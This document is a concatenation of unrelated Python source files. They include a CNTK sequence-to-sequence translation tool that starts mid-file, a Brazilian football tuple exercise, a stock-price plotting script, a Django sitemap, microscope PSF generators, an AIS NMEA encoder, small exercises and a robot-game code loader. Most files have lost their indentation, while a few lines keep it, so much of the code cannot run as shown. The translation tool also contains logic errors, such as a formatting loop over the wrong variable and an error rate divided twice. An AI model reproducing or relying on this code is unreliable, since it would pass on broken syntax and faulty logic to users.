# gets token, and whether this is the source or target sequence boolean
def token_to_pairing_index(self, token, source):
field = ''
if source == True:
field = self.seq_field_src
elif source == False:
field = self.seq_field_trgt
token_index = self.w2i[token]
return '|%s %d:1' %(field, token_index)
def convert_to_ctf(self):
# use sequence counter & count until eos on both source and target token full lists, then transfer them to local lists
sequence_counter = 0
ctf_src_list=[]
ctf_trgt_list=[]
# add tuple of sequence number & tokens(indexed) to each pairing list
for token in self.tokens_source:
if token != self.target_eos:
# if the token is not end of sentence - just append it
ctf_src_list.append((sequence_counter, self.token_to_pairing_index(token, source=True)))
else:
# if the token IS end of sentence - append it, and then iterate the sequence counter forward
ctf_src_list.append((sequence_counter, self.token_to_pairing_index(token, source=True)))
sequence_counter += 1
sequence_counter = 0
for token in self.tokens_target:
if token != self.target_eos:
# if the token is not end of sentence - just append it
ctf_trgt_list.append((sequence_counter, self.token_to_pairing_index(token, source=False)))
else:
# if the token IS end of sentence - append it, and then iterate the sequence counter forward
ctf_trgt_list.append((sequence_counter, self.token_to_pairing_index(token, source=False)))
sequence_counter += 1
        # pair the indices by creating two lists of lists - each list's corresponding index is the sequence
sequence_counter = 0
tmp_lst=[]
list_of_lists_src=[]
for item in ctf_src_list:
# each item is a tuple
sequence, index = item
if sequence == sequence_counter:
tmp_lst.append(index)
elif sequence == (sequence_counter + 1):
sequence_counter += 1
list_of_lists_src.append(tmp_lst)
tmp_lst=[index]
sequence_counter=0
tmp_lst=[]
list_of_lists_trgt=[]
for item in ctf_trgt_list:
sequence, index = item
if sequence == sequence_counter:
tmp_lst.append(index)
elif sequence == (sequence_counter + 1):
sequence_counter += 1
list_of_lists_trgt.append(tmp_lst)
tmp_lst=[index]
# both lists should have same length
# in fact, the two documents HAVE TO HAVE THE SAME AMOUNT OF PAIRED SEQUENCES!
paired_list=[]
if len(list_of_lists_src) != len(list_of_lists_trgt):
print("Error: The source and target documents don't have the same amount of sequences.\nThe two documents must have the same amount of sequences in order for the sequences to be paired.")
print("The sequence counts are- Source:{}, Target:{}".format(len(list_of_lists_src),len(list_of_lists_trgt)))
sys.exit("Stopping action")
for i in range(len(list_of_lists_src)):
# every i is the number of sequence
# check which words list is longer (if either)
if len(list_of_lists_src[i]) > len(list_of_lists_trgt[i]):
# list of source tokens is longer, the target list is shorter
# the difference
dif = abs(len(list_of_lists_src[i]) - len(list_of_lists_trgt[i]))
for difference in range(dif):
# add enough empty strings to close the difference gap, to the shorter list
list_of_lists_trgt[i].append(' ')
elif len(list_of_lists_src[i]) < len(list_of_lists_trgt[i]):
# list of target tokens is longer, the source list is shorter
# the difference
dif = abs(len(list_of_lists_src[i]) - len(list_of_lists_trgt[i]))
for difference in range(dif):
# add enough empty strings to close the difference gap, to the shorter list
list_of_lists_src[i].append(' ')
# now both word lists are the same length
for n in range(len(list_of_lists_src[i])):
line = '\t'.join([str(i), list_of_lists_src[i][n], list_of_lists_trgt[i][n],'\n'])
paired_list.append(line)
#for item in paired_list:
# print(item)
return paired_list
def ctf_writer(self, words):
ctf_file = open(self.ctf_filepath, "w", encoding='utf-8-sig')
for line in words:
ctf_file.write(line)
ctf_file.close()
print("Paired CTF saved to {}.".format(self.ctf_filepath))
class SequenceToSequence ():
''' FUTURE IMPROVEMENTS:
    ALL FILES DECLARATION WILL BE SUPPORTED WITHOUT EXTENSION NAMES (WITHOUT .TXT, .CTF, ETC)
EPOCH SIZE WILL BE AUTOMATICALLY DETERMINED
TEST_FILE and VALIDATION_FILE WILL BE OPTIONAL, WITH OPTION TO AUTOMATICALLY CREATE THEM BASED ON PART OF THE TRAINING FILE
MORE INFORMATION ABOUT THE DATA FORMAT, FOR MANUAL FORMATTING (IF DESIRED BY USER), TO BE ADDED TO GETDATAHELP
'''
def __init__(self, model_name, model_save_path, training_data_path):
self.model_name = model_name
self.model_save_path = model_save_path
self.training_data_path = training_data_path
self.vocabulary = None
self.index2word = None
self.word2index = None
self.model = None
def GetHelp(self):
print("Help about using the SequenceToSequence module. If you want help with the file formats - call GetDataHelp\n\n")
print("This is the SequenceToSequence easy-to-use tool, using CNTK for everything under-the-hood.\nThe tool utilizes an LSTM architecture with embedding and attention, and learns to model one input text to another.\nPossible uses: Translation from language A to language B, from normal text to 18th century literary style, etc.")
print("\nHow to use the SequenceToSequence tool:\n1) Create a SequenceToSequence instance and provide it:\na) the model name (string), model save path (string) and training data path (string).\nFor example: model_name='my_model', model_save_path='c:/model/', training_data_path='c:/model/data'")
print("\n\n2) Call SetFileData and give it:\na) The names and extensions of your training, validation, testing and vocabulary files.\nFor example train_file='train.ctf', validation_file='validation.ctf', test_file='test.ctf', vocab_file='vocab.mapping'\nb) The size of your total vocabulary, including both input and target words, as well as symbols (like apostrophes) and sequence start and end markers.\nc) The input_marker and output_marker fields, and the sequence start and end markers. These are optional to set - the defaults are: input_marker='S0', output_marker='S1', start_marker='<s>', end_marker='</s>'.\nThese are the field markers of the source and target words, and start and end markers of a sequence's start and finish.")
print("\nNOTE: test_file and validation_file - the file names are mandatory, but if you don't have separate test and validation files, simply put the exactly same filename as your train_file in them")
print("\n\n3) Call SetModelVariables and give it:\nPer how many epochs to save the model, the learning rate, gradient clipping threshold, minibatch size, evaluation minibatch size, number of layers, hidden layers size, embedding dimensions, attention dimensions and length increase.\nAll these variables are optional - and have a pre-set default.\nThe defaults are: save_per_epochs=2, lr=0.005, grad_clip_thresh=2.3, minibatch_size=72, eval_minibatch_size=72, layer_count=2, hidden_dim=512, embedding_dim=200, attention_dim=128, length_increase=1.5")
print("\n\nNote: It is advised to leave the learning rate, gradient clipping threshold, embedding dimensions and attention dimensions, values as default. You have the option to tweak them as you like, but the default will work well.\nIt is also advised to not go overboard with the number of layers, since returns will be diminishing, while computational cost will skyrocket. Same with the hidden layer dimensions.")
print("\n\n4) Call InitiateModel. If you already have a trained model saved, call it with the variables loading_model = True and load_model_path = path to the model file you want to load. It has to include the file name and extension as well.\nIf you do not have a saved model, simply call InitiateModel without any variables (InitiateModel())")
print("\n\n5) Call TrainModel and give it the variables:\nepochs = the number of epochs to train on\nepoch_size = the size of each epoch, which is how many lines there are in your training ctf file. You can get this by just opening the .ctf file in an advanced text file reader, like notebook++, scrolling to the bottom, and seeing which line number the last line is./nNOTE: Future versions will obtain this information automatically.\nepoch_size_multiplier = is an OPTIONAL variable, it determines how much % of the epoch_size each epoch should train. It's default value is 1.0, for 100%\nNOTE: It is advised to only provide the variables epochs and epoch_size. Only provide epoch_size_multiplier if you have specific need for it")
print("\n The TrainModel will also save the model to the same folder where your .ctf and .mapping files are")
print("\n\n6) Optional - call EvaluateModel (EvaluateModel()) with no added variables. Do this if you want to evaluate the model on the test_file you provided")
print("\n\n7) Call TranslateFromFile - this method will translate your model. Give it the variables translate_path = the path, including file name with .txt extension (saved as UTF-8) of the .txt file you want the trained model to translate\nsave_translation_path = the path to the directory where you want to save the translated file\ntranslation_name = the name with which to save the translated file, without extension (the file is automatically saved as a .txt)")
def GetDataHelp(self):
print("To use the SequenceToSequence easy-to-use tool, your data has to be formatted in the correct way. The easiest way to format your data correctly is call the TextToCtf module from this library.")
print("\nInstantiate the TextToCtf module of the library, and call it's GetHelp function to get use information. It's super easy, and does all the work for you!")
def SetFileData(self, train_file, validation_file, test_file, vocabulary_file, input_marker='S0', output_marker='S1', start_marker='<s>', end_marker='</s>'):
self.train_file = train_file
self.validation_file = validation_file
self.test_file = test_file
self.vocabulary_file = vocabulary_file
# how many items are in the full vocabulary
# should both be the same if using same vocab file
self.vocab_size = None # CHANGED THIS FROM BEING MANUALLY INPUT TO BEING CALCULATED AUTOMATICALLY IN THE get_vocab FUNCTION
# FIX THIS IN THE HELP FILE
self.input_marker = input_marker
self.output_marker = output_marker
self.start_marker = start_marker
self.end_marker = end_marker
# Try to initiate dictionaries automatically without needing to call it
self.initiate_dictionaries()
def get_vocab(self, path):
vocab = [word.strip() for word in open(path, encoding='utf-8-sig').readlines()]
self.vocab_size = len(vocab)
i2w = { index:word for index,word in enumerate(vocab)}
w2i = { word:index for index,word in enumerate(vocab)}
return (vocab, i2w, w2i)
def initiate_dictionaries(self):
self.train_file = os.path.join(self.training_data_path, self.train_file)
self.validation_file = os.path.join(self.training_data_path, self.validation_file)
self.test_file = os.path.join(self.training_data_path, self.test_file)
self.vocabulary_file = os.path.join(self.training_data_path, self.vocabulary_file)
self.data_path = {
'validation': self.validation_file,
'training': self.train_file,
'testing': self.test_file,
'vocab_file': self.vocabulary_file,
}
self.vocabulary, self.index2word, self.word2index = self.get_vocab(self.data_path['vocab_file'])
self.input_vocab_dim = self.vocab_size
self.label_vocab_dim = self.vocab_size
def SetModelVariables(self, save_per_epochs=2, lr=0.001, grad_clip_thresh=2.3, layer_count=2, minibatch_size=72, eval_minibatch_size=72, hidden_dim=512, embedding_dim=200, attention_dim=128, length_increase=1.5):
self.lr = lr
self.layer_count = layer_count
self.hidden_dim = hidden_dim
self.embedding_dim = embedding_dim
self.length_increase = length_increase
self.attention_dim = attention_dim
self.minibatch_size = minibatch_size
self.grad_clip_thresh = grad_clip_thresh
self.save_per_epochs = save_per_epochs
self.eval_minibatch_size = eval_minibatch_size
# initiate sequences axes and indices
self.sequences_axes_and_indices()
def create_reader(self, path, is_training):
return C.io.MinibatchSource(C.io.CTFDeserializer(path, C.io.StreamDefs(
features = C.io.StreamDef(field=self.input_marker, shape=self.input_vocab_dim, is_sparse=True),
labels = C.io.StreamDef(field=self.output_marker, shape=self.label_vocab_dim, is_sparse=True)
)), randomize = is_training, max_sweeps = C.io.INFINITELY_REPEAT if is_training else 1)
def sequences_axes_and_indices(self):
self.sentence_start = C.constant(np.array([w==self.start_marker for w in self.vocabulary], dtype = np.float32))
self.sentence_end_index = self.vocabulary.index(self.end_marker)
input_axis = C.Axis('input_axis')
label_axis = C.Axis('label_axis')
self.input_sequence = C.layers.SequenceOver[input_axis]
self.label_sequence = C.layers.SequenceOver[label_axis]
def create_model(self):
embed = C.layers.Embedding(self.embedding_dim, name='embed')
with C.layers.default_options(enable_self_stabilization=True, go_backwards=False):
LastRecurrence = C.layers.Recurrence
encode = C.layers.Sequential([embed, C.layers.Stabilizer(), C.layers.For(range(self.layer_count-1), lambda: C.layers.Recurrence(C.layers.LSTM(self.hidden_dim))), LastRecurrence(C.layers.LSTM(self.hidden_dim), return_full_state = True), (C.layers.Label('encoded_h'), C.layers.Label('encoded_c')), ])
with C.layers.default_options(enable_self_stabilization = True):
stab_in = C.layers.Stabilizer()
rec_blocks = [C.layers.LSTM(self.hidden_dim) for i in range(self.layer_count)]
stab_out = C.layers.Stabilizer()
proj_out = C.layers.Dense(self.label_vocab_dim, name='out_proj')
attention_model = C.layers.AttentionModel(attention_dim=self.attention_dim, name='attention_model')
@C.Function
def decode(history, input):
encoded_input = encode(input)
r = history
r = embed(r)
r = stab_in(r)
for i in range(self.layer_count):
rec_block = rec_blocks[i]
if i == 0:
@C.Function
def lstm_with_attention(dh, dc, x):
h_att = attention_model(encoded_input.outputs[0], dh)
x = C.splice(x, h_att)
return rec_block(dh, dc, x)
r = C.layers.Recurrence(lstm_with_attention)(r)
else:
r = C.layers.Recurrence(rec_block)(r)
r = stab_out(r)
r = proj_out(r)
r = C.layers.Label('out_proj_r')(r)
return r
return decode
def create_model_train(self, s2smodel):
@C.Function
def model_train(input, labels):
past_labels = C.layers.Delay(initial_state = self.sentence_start)(labels)
return (s2smodel(past_labels, input))
return (model_train)
def create_model_greedy(self, s2smodel):
@C.Function
@C.layers.Signature(self.input_sequence[C.layers.Tensor[self.input_vocab_dim]])
def model_greedy(input):
unfold = C.layers.UnfoldFrom(lambda history: s2smodel(history, input) >> C.hardmax, until_predicate = lambda w: w[..., self.sentence_end_index], length_increase = self.length_increase)
return unfold(initial_state = self.sentence_start, dynamic_axes_like = input)
return model_greedy
def create_criterion_function(self, model):
@C.Function
@C.layers.Signature(input=self.input_sequence[C.layers.Tensor[self.input_vocab_dim]], labels=self.label_sequence[C.layers.Tensor[self.label_vocab_dim]])
def criterion(input, labels):
postprocessed_labels = C.sequence.slice(labels, 1, 0)
z = model(input, postprocessed_labels)
ce = C.cross_entropy_with_softmax(z, postprocessed_labels)
errs = C.classification_error(z, postprocessed_labels)
return (ce, errs)
return criterion
def get_lines_count(self):
with open(self.data_path['training'], encoding='utf-8-sig') as file:
for index, line in enumerate(file):
pass
return index + 1
def create_sparse_to_dense(self, input_vocab_dim):
I = C.Constant(np.eye(input_vocab_dim))
@C.Function
@C.layers.Signature(self.input_sequence[C.layers.SparseTensor[input_vocab_dim]])
def no_op(input):
return C.times(input, I)
return no_op
def format_sequences(self, sequences, index2word):
return[" ".join([index2word[np.argmax(word)] for word in sequences]) for sequence in sequences]
def train(self, train_reader, validation_reader, vocabulary, index2word, s2smodel, max_epochs, epoch_size):
model_train = self.create_model_train(s2smodel)
criterion = self.create_criterion_function(model_train)
model_greedy = self.create_model_greedy(s2smodel)
lr = self.lr
learner = C.fsadagrad(model_train.parameters, lr = C.learning_rate_schedule([lr]*2+[lr/2]*3+[lr/4], C.UnitType.sample, epoch_size), momentum = C.momentum_as_time_constant_schedule(1100), gradient_clipping_threshold_per_sample=self.grad_clip_thresh, gradient_clipping_with_truncation=True)
trainer = C.Trainer(None, criterion, learner)
total_samples = 0
mbs = 0
eval_freq = 100
C.logging.log_number_of_parameters(model_train); print()
progress_printer = C.logging.ProgressPrinter(freq=30, tag='Training')
sparse_to_dense=self.create_sparse_to_dense(self.input_vocab_dim)
run_count = 0
for epoch in range(max_epochs):
while total_samples < (epoch+1) * epoch_size:
mb_train = train_reader.next_minibatch(self.minibatch_size)
trainer.train_minibatch({criterion.arguments[0]: mb_train[train_reader.streams.features], criterion.arguments[1]: mb_train[train_reader.streams.labels]})
progress_printer.update_with_trainer(trainer, with_metric=True)
if mbs % eval_freq == 0:
mb_valid = validation_reader.next_minibatch(1)
e = model_greedy(mb_valid[validation_reader.streams.features])
print(self.format_sequences(sparse_to_dense(mb_valid[validation_reader.streams.features]), index2word))
print('->')
print(self.format_sequences(e, index2word))
total_samples += mb_train[train_reader.streams.labels].num_samples
mbs += 1
if epoch % self.save_per_epochs == 0:
run_count += 1
model_save_name = '%s.cmf' %self.model_name
model_path = os.path.join(self.model_save_path, model_save_name)
print("Saving model to %s" %model_path)
s2smodel.save(model_path)
progress_printer.epoch_summary(with_metric=True)
model_save_name = '%s_trained_%d_epochs.cmf' %(self.model_name, max_epochs)
model_path = os.path.join(self.model_save_path, model_save_name)
print("Saving final model to %s" %model_path)
s2smodel.save(model_path)
print("%d epochs complete" %max_epochs)
# ADD TO HELP FUNCTION
def InitiateModel(self, loading_model=False, load_model_path=None):
self.loading_model = loading_model
self.load_model_path = load_model_path
        if loading_model:
if not os.path.exists(self.load_model_path):
print("The path %s does not exist. Cannot load model from path.\nInitializing new model." %self.load_model_path)
self.model = self.create_model()
else:
self.model = C.Function.load(self.load_model_path)
else:
self.model = self.create_model()
#return model
# ADD TO HELP FUNCTION
def TrainModel(self, epochs, epoch_size=0, epoch_size_multiplier=1.0):
train_reader = self.create_reader(self.data_path['training'],True)
validation_reader = self.create_reader(self.data_path['validation'],True)
self.epochs = epochs
if epoch_size != 0:
self.epoch_size = int(epoch_size*epoch_size_multiplier)
else:
self.epoch_size = self.get_lines_count()
self.train(train_reader, validation_reader, self.vocabulary, self.index2word, self.model, self.epochs, self.epoch_size)
def create_test_reader(self):
test_reader = self.create_reader(self.data_path['testing'], False)
return test_reader
def evaluate_decoding(self, reader, s2smodel, index2word):
model_decoding = self.create_model_greedy(s2smodel)
progress_printer = C.logging.ProgressPrinter(tag='Evaluation')
sparse_to_dense = self.create_sparse_to_dense(self.input_vocab_dim)
minibatch_size = self.eval_minibatch_size
num_total = 0
num_wrong = 0
while True:
mb = reader.next_minibatch(minibatch_size)
if not mb:
break
evaluate = model_decoding(mb[reader.streams.features])
outputs = self.format_sequences(evaluate, index2word)
labels = self.format_sequences(sparse_to_dense(mb[reader.streams.labels]), index2word)
mrkr = '%s ' %self.start_marker
outputs = [mrkr + output for output in outputs]
for s in range(len(labels)):
for w in range(len(labels[s])):
num_total += 1
if w < len(outputs[s]):
if outputs[s][w] != labels[s][w]:
num_wrong += 1
rate = num_wrong / num_total
print("Error rate is {:.2f}% out of a total {}.".format((100 * rate / num_total), num_total))
return rate
def EvaluateModel(self):
tr = self.create_test_reader()
self.evaluate_decoding(tr, self.model, self.index2word)
    ### TODO: translation should split the input into sentences rather than processing the whole file as one sequence
def translate(self, tokens, model_decoding, vocabulary, index2word):
vdict = {v:i for i,v in enumerate(vocabulary)}
'''print(vdict)
for word in tokens:
print(word)
for c in tokens:
print(vdict[c])'''
        try:
            w = [vdict[self.start_marker]] + [vdict[c] for c in tokens] + [vdict[self.end_marker]]
        except KeyError:
            print("Input contains an unexpected token.")
            return []
query = C.Value.one_hot([w], len(vdict))
pred = model_decoding(query)
pred = pred[0]
prediction = np.argmax(pred, axis=-1)
translation = [index2word[i] for i in prediction]
return translation
def prep_translation_data(self, path):
non_symbols = ["'",'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'] # this is a constant list
symbols_replace = ['”', '“', "it's", "i'm", "they're", "what're", "he's", "she's", "you're","we're","isn't", "aren't", "wasn't", "weren't", "don't","doesn't","didn't","i've", "we've", "haven't", "you've", "hadn't", "can't", "couldn't", "mustn't", "shan't", "shouldn't", "we'll", "they'll", "i'll", "we'd", "you'd","i'd","he'd","she'd","it'd","we'd","they'd","let's"] # this is a constant list
symbols_replace_with = ['"', '"', "it is", "i am", "they are", "what are", "he is", "she is", "you are", "we are", "is not", "are not", "was not", "were not", "do not", "does not", "did not", "i have", "we have", "have not", "you have", "had not", "can not", "could not", "must not", "shall not", "should not", "we will", "they will", "i will", "we would", "you would", "i would", "he would", "she would", "it would", "we would", "they would", "let us"]
# the following several functions will either be converted to a single class, or restructured into the code
def txt_to_tokens(filepath):
txt = open(filepath, 'r', encoding='utf-8-sig')
words = txt.read().lower().split()
return words
def split_n_flatten(words_list):
# split all words & symbols (creates list of lists)
for index in range(len(words_list)):
words_list[index] = words_list[index].split()
# flatten list of lists
words_list = [word for sublist in words_list for word in sublist]
return words_list
def prep_tokens(path):
words = txt_to_tokens(path)
# space out all symbols from words
for index in range(len(words)):
new_word = ''
for character in words[index]:
if character not in non_symbols:
new_c = ''.join([' ',character,' '])
new_word = new_word + new_c
else:
new_word = new_word + character
words[index] = new_word
# split & flatten
words = split_n_flatten(words)
# adding bos to the beginning of the string. only used in prep-to-ctf or prep for training
# words.insert(0, target_bos)
            # replace contractions and special symbols with their expanded forms
for index in range(len(words)):
if words[index] in symbols_replace:
words[index] = symbols_replace_with[symbols_replace.index(words[index])]
# split & flatten
words = split_n_flatten(words)
# ALL TOKENS SHOULD NOW BE PRE-PROCESSED
return words
words = prep_tokens(path)
return words
def save_translated_sequence(self, path, data, trans_name):
file_path = os.path.join(path, trans_name)
trans_file = open(file_path, 'w', encoding='utf-8-sig')
for word in data:
trans_file.write(word)
trans_file.write(' ')
trans_file.close()
print("Translation saved to %s." %path)
def TranslateFromFile(self, translate_path, save_translation_path, translation_name='translation'):
translation_name = '%s.txt' %translation_name
if not os.path.exists(translate_path):
print("File path %s does not exist.")
else:
            if self.model is None:
print("Model is not initiated. Please call InitiateModel function first to initiate the model.")
else:
model_decoding = self.create_model_greedy(self.model)
out_data = []
trans_data = self.prep_translation_data(translate_path)
print(trans_data)
out_tokens = self.translate(trans_data, model_decoding, self.vocabulary, self.index2word)
out_data.extend(out_tokens)
out_data = ["." if tok==self.end_marker else tok[0:] for tok in out_data]
self.save_translated_sequence(save_translation_path, out_data, translation_name)
sys.stdout.flush()
''' #This function will break every word into it's letters. But I don't want it (yet) coz I want it to be a word 2 word model.
for word in trans_data:
#takes words and breaks into letters, and lower cases them
#in_tokens = [c.lower() for c in word]
out_tokens =... '''
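# A minimal usage sketch (hypothetical instance name `translator`; the class and its
# constructor arguments are defined earlier in this file, so the calls below are
# illustrative only):
#
#   translator.InitiateModel(loading_model=False)
#   translator.TrainModel(epochs=10)
#   translator.EvaluateModel()
#   translator.TranslateFromFile('input.txt', './', translation_name='demo')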
|
'''
Create a tuple filled with the top 20 teams of the Brazilian Football
Championship (Campeonato Brasileiro) table, in order of placement. Then show:
A) Only the top 5 teams.
B) The last 4 teams in the table.
C) A list of the teams in alphabetical order.
D) The position of Chapecoense in the table.
'''
times = ('Flamengo', 'Santos', 'Palmeiras', 'Grêmio', 'Athletico Paranaense',
'São Paulo', 'Internacional', 'Corinthians', 'Fortaleza', 'Goiás',
'Bahia', 'Vasco da Gama', 'Atlético', 'Fluminense', 'Botafogo', 'Ceará',
'Cruzeiro', 'Csa', 'Chapecoense', 'Avaí')
print('Top 5 teams:')
print(times[:5])
print('\nLast 4 teams:')
print(times[16:])  # or times[-4:]
print('\nTeams in alphabetical order:')
print(sorted(times))
print(f'\nChapecoense is in position {times.index("Chapecoense") + 1}')
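# Quick sanity check (illustrative): negative slicing yields the same last four teams.
assert times[-4:] == times[16:]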
|
# =============================================================================
# Import OHLCV data and perform basic visualizations
# Author : Mayank Rasu
# Please report bug/issues in the Q&A section
# =============================================================================
# Import necessary libraries
import pandas as pd
import pandas_datareader.data as pdr
import datetime
import matplotlib.pyplot as plt
# Download historical data for required stocks
tickers = ["MSFT","AMZN","AAPL","CSCO","IBM","FB"]
close_prices = pd.DataFrame() # dataframe to store close price of each ticker
attempt = 0 # initializing retry counter
drop = [] # initializing list to store tickers whose close price was successfully extracted
while len(tickers) != 0 and attempt <= 5:
tickers = [j for j in tickers if j not in drop] # removing stocks whose data has been extracted from the ticker list
for i in range(len(tickers)):
try:
temp = pdr.get_data_yahoo(tickers[i],datetime.date.today()-datetime.timedelta(3650),datetime.date.today())
temp.dropna(inplace = True)
close_prices[tickers[i]] = temp["Adj Close"]
drop.append(tickers[i])
except:
print(tickers[i]," :failed to fetch data...retrying")
continue
attempt+=1
# Handling NaN Values
close_prices.fillna(method='bfill',axis=0,inplace=True) # Replaces NaN values with the next valid value along the column
daily_return = close_prices.pct_change() # Creates dataframe with daily return for each stock
# Data visualization
close_prices.plot() # Plot of all the stocks superimposed on the same chart
cp_standardized = (close_prices - close_prices.mean())/close_prices.std() # Standardization
cp_standardized.plot() # Plot of all the stocks standardized and superimposed on the same chart
close_prices.plot(subplots=True, layout = (3,2), title = "Tech Stock Price Evolution", grid =True) # Subplots of the stocks
# Pyplot demo
fig, ax = plt.subplots()
plt.style.available # available style names; evaluating this has no effect in a script
plt.style.use('ggplot')
ax.set(title="Daily return on tech stocks", xlabel="Tech Stocks", ylabel = "Daily Returns")
plt.bar(daily_return.columns,daily_return.mean())
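# Optional extension (illustrative, not part of the original script): compound the
# daily returns computed above into a cumulative-return curve per ticker.
cumulative_return = (1 + daily_return).cumprod() - 1
cumulative_return.plot(title="Cumulative return of tech stocks")
plt.show()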
|
from django.contrib.sitemaps import Sitemap
from .models import NursingHome
def update_sitemap(sitemap_dict):
sitemap_dict.update({
'nursinghomes-nursinghome': NursingHomeSitemap,
})
return sitemap_dict
class NursingHomeSitemap(Sitemap):
priority = 0.25
changefreq = 'yearly'
def items(self):
"""
Return published entries.
"""
return NursingHome.objects.all()
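# Hook-up sketch (hypothetical): the host project's urls.py could register this
# sitemap roughly as follows; the module path and names below are assumptions,
# not part of this app.
#
#   from django.contrib.sitemaps.views import sitemap
#   from django.urls import path
#   from nursinghomes.sitemaps import update_sitemap
#
#   sitemaps = update_sitemap({})
#   urlpatterns = [
#       path('sitemap.xml', sitemap, {'sitemaps': sitemaps}, name='sitemap'),
#   ]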
|
#!/usr/bin/env python3
""" Copyright © 2020 Borys Olifirov
Generating PSF estimation by two models,
Richards-Wolf's (PSF library)
and Gibson-Lanni (flowdec library, module gila.py)
"""
import sys
import logging
import numpy as np
import psf
import gila
def psfRiWo(setting, ems=False):
""" Calculate Richards-Wolf PSF model
    return PSF as a numpy array, values are normalised from 0 to 1
"""
args = {'shape': (256, 256), # number of samples in z and r direction
'dims': (5.0, 5.0), # size in z and r direction in micrometers
'ex_wavelen': 488.0,
'em_wavelen': 520.0,
'num_aperture': 1.2,
'refr_index': 1.333,
'magnification': 1.0,
'pinhole_radius': 0.05,
'pinhole_shape': 'square'}
args.update(setting)
if ems:
em_psf = psf.PSF(psf.ISOTROPIC| psf.EMISSION, **args)
args.update({'empsf': em_psf})
confocal_psf = psf.PSF(psf.ISOTROPIC | psf.CONFOCAL, **args)
return confocal_psf.volume()
def psfGiLa(setting):
""" Calculate Gibson-Lanni PSF model
    requires the gila.py module
    return PSF as a numpy array, values are normalised from 0 to 1
"""
args = {'size_x': 128,
'size_y': 128,
'size_z': 128,
'num_basis': 100, # Number of rescaled Bessels that approximate the phase function
'num_samples': 1000, # Number of pupil samples along radial direction
'oversampling': 2, # Defines the upsampling ratio on the image space grid for computations
'NA': 0.9,
'wavelength': 0.512, # microns
'M': 60, # magnification
'ns': 1.33, # specimen refractive index (RI)
'ng0': 1.5, # coverslip RI design value
'ng': 1.5, # coverslip RI experimental value
'ni0': 1.33, # immersion medium RI design value
'ni': 1.33, # immersion medium RI experimental value
'ti0': 150, # microns, working distance (immersion medium thickness) design value
'tg0' :170, # microns, coverslip thickness design value
'tg': 170, # microns, coverslip thickness experimental value
'res_lateral': 0.1, # microns
'res_axial': 0.1, # microns
'pZ': 2, # microns, particle distance from coverslip
'min_wavelength': 0.488} # scaling factors for the Fourier-Bessel series expansion, microns
args.update(setting)
return gila.generate(args)
if __name__=="__main__":
pass
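    # Minimal demonstration sketch (illustrative parameter values, not taken from
    # any particular experiment): build a small Richards-Wolf PSF and report its shape.
    demo_psf = psfRiWo({'shape': (64, 64), 'dims': (2.0, 2.0)})
    print('Richards-Wolf PSF volume shape:', demo_psf.shape)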
# That's all!
|
#!/usr/bin/env python
__author__ = 'Kurt Schwehr'
__version__ = '$Revision: 4799 $'.split()[1]
__revision__ = __version__ # For pylint
__date__ = '$Date: 2006-09-25 11:09:02 -0400 (Mon, 25 Sep 2006) $'.split()[1]
__copyright__ = '2008'
__license__ = 'Apache 2.0'
__doc__ ='''
Output python code for BBM encode and decode for a particular binary message
@requires: U{Python<http://python.org/>} >= 2.5
@requires: U{epydoc<http://epydoc.sourceforge.net/>} >= 3.0.1
@since: 2008-Mar-30
@status: under development
@see: IEC-PAS 61162-100 Ed. 1 Page 19: BBM - AIS Broadcast Binary Message
'''
import sys
import os
import StringIO
import ais.nmea
def create(payload,fill_bits=0,prefix='xx',seq_msg_id=0, msg_type=8,ais_chan='A'):
'''
>>> create('FstG8N6Kw<3<P6P1=87l0@',fill_bits=4,prefix='EC')
'!ECBBM,1,1,0,A,8,FstG8N6Kw<3<P6P1=87l0@,4*7A'
'''
assert msg_type in (8,) #(8,14)
# FIX: handle msg 14
assert seq_msg_id >= 0 and seq_msg_id < 10
assert ais_chan in 'AB'
assert len(payload) <= 58 # FIX: handle messages with more than 348 bits
assert fill_bits>=0 and fill_bits<=5
p = ['!'+prefix+'BBM',]
p.append('1') # total sentences - FIX: handle multiline BBM messages
p.append('1') # sentence number - FIX: handle multiline BBM messages
p.append(str(seq_msg_id))
p.append(ais_chan)
p.append(str(msg_type))
p.append(payload)
p.append(str(fill_bits)+'*')
s = ','.join(p)
s+=ais.nmea.checksumStr(s)
return s
def do_doctest(verbose=False):
'''
@return: success
@rtype: bool
'''
success = True
print os.path.basename(sys.argv[0]), 'doctests ...',
argv_orig = sys.argv
sys.argv = [sys.argv[0]]
if verbose:
sys.argv.append('-v')
import doctest
numfail, numtests = doctest.testmod()
if numfail == 0:
print 'ok numtests:', numtests
else:
print 'FAILED', numfail, 'tests out of', numtests
success = False
sys.argv = argv_orig # Restore the original args
return success
def main():
'''
FIX: document main
'''
from optparse import OptionParser
parser = OptionParser(usage="%prog [options]",
version="%prog "+__version__+' ('+__date__+')')
parser.add_option('--doc-test', dest='doctest', default=False, action='store_true',
help='run the documentation tests')
parser.add_option('-v', '--verbose', dest='verbose', default=False, action='store_true',
help='run the tests run in verbose mode')
(options, args) = parser.parse_args()
if options.doctest:
if not do_doctest(options.verbose):
sys.exit('Something Failed')
if __name__ == '__main__':
main()
|
#8.1
def count_words(input_str):
return len(input_str.split())
print(count_words('This is a string'))
#8.2
demo_str = 'Hello world'
print(count_words(demo_str))
#8.3
def find_min(num_list):
min_item = num_list[0]
for num in num_list:
if min_item >= num:
min_item = num
    return min_item
print(find_min([1,2,3,4]))
#8.4
demo_list = [1,2,3,4,5,6]
print(find_min(demo_list))
#8.5
mix_list = [1,2,3,4,'a',5,6]
try:  # comparing str and int raises TypeError under Python 3
    print(find_min(mix_list))
except TypeError as err:
    print('find_min failed on the mixed list:', err)
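# Illustrative check: the built-in min() agrees with find_min for purely numeric input.
assert find_min(demo_list) == min(demo_list)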
|
import ast
import inspect
import random
import sys
import traceback
import imp
###
from robotexception import *
from settings import settings
import rg
def init_settings(map_file):
global settings
map_data = ast.literal_eval(open(map_file).read())
settings.spawn_coords = map_data['spawn']
settings.obstacles = map_data['obstacle']
rg.set_settings(settings)
class DefaultRobot:
def act(self, game):
return ['guard']
class Player:
def __init__(self, code=None, robot=None):
if code is not None:
self._robot = None
self._mod = imp.new_module('usercode%d' % id(self))
exec code in self._mod.__dict__
elif robot is not None:
self._robot = robot
else:
raise Exception('you need to provide code or a module')
def get_usercode_obj(self, class_name, default):
if hasattr(self._mod, class_name):
if inspect.isclass(getattr(self._mod, class_name)):
return getattr(self._mod, class_name)()
return default()
def get_robot(self):
if self._robot is not None:
return self._robot
self._robot = self.get_usercode_obj('Robot', DefaultRobot)
return self._robot
class InternalRobot:
def __init__(self, location, hp, player_id, field):
self.location = location
self.hp = hp
self.player_id = player_id
self.field = field
